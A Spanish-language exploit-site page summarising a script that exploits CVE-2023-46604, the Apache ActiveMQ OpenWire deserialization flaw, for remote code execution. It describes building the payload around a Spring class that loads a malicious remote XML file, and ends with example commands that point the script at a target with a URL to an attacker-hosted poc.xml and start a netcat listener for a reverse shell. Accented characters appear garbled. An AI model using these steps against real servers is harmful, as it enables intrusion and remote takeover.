Share
## https://sploitus.com/exploit?id=3D224FBD-135B-51B6-BDF7-5668CE8DECF7
Resumen T茅cnico del Ataque: CVE-2023-46604

El script explota una vulnerabilidad de deserializaci贸n insegura en Apache ActiveMQ (CVE-2023-46604) para lograr la ejecuci贸n remota de c贸digo en el servidor objetivo.
Descripci贸n del Proceso de Explotaci贸n

    Objetivo de la Vulnerabilidad:
        La vulnerabilidad reside en el protocolo OpenWire de Apache ActiveMQ.
        Permite la deserializaci贸n insegura de objetos, lo que puede ser aprovechado para ejecutar c贸digo arbitrario en el servidor.

    Requisitos Previos:
        Acceso de red al servidor ActiveMQ.
        Un archivo XML malicioso (poc.xml) disponible a trav茅s de una URL accesible por el servidor objetivo.

    Componentes del Ataque:
        Script Python: Automatiza el env铆o del payload malicioso al servidor ActiveMQ.
        Archivo XML (poc.xml): Contiene un bean de Spring que define la ejecuci贸n de un comando malicioso (por ejemplo, abrir una shell inversa).

Pasos del Ataque

    Preparaci贸n del Payload:
        El script construye un mensaje en hexadecimal que incluye:
            El nombre de la clase Java: org.springframework.context.support.ClassPathXmlApplicationContext.
            La URL del archivo XML malicioso.
        El payload se convierte en una secuencia de bytes que puede ser enviada a trav茅s del protocolo OpenWire.

    Env铆o del Payload:
        El script abre una conexi贸n de socket TCP al servidor ActiveMQ en el puerto especificado (por defecto 61616).
        Env铆a el payload malicioso al servidor.

    Ejecuci贸n del C贸digo Malicioso:
        El servidor ActiveMQ deserializa el objeto especificado en el payload.
        Debido a la deserializaci贸n insegura, se carga y ejecuta el bean de Spring definido en el archivo XML.
        Este bean ejecuta un comando malicioso (por ejemplo, una shell inversa) en el servidor.

        _________________________________________________________
ejemplo de ejecucion:
- ***python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml***

- **nc -lvnp 9001**



este script fue copiado y modificado en espa帽ol:https://github.com/evkl1d/CVE-2023-46604.git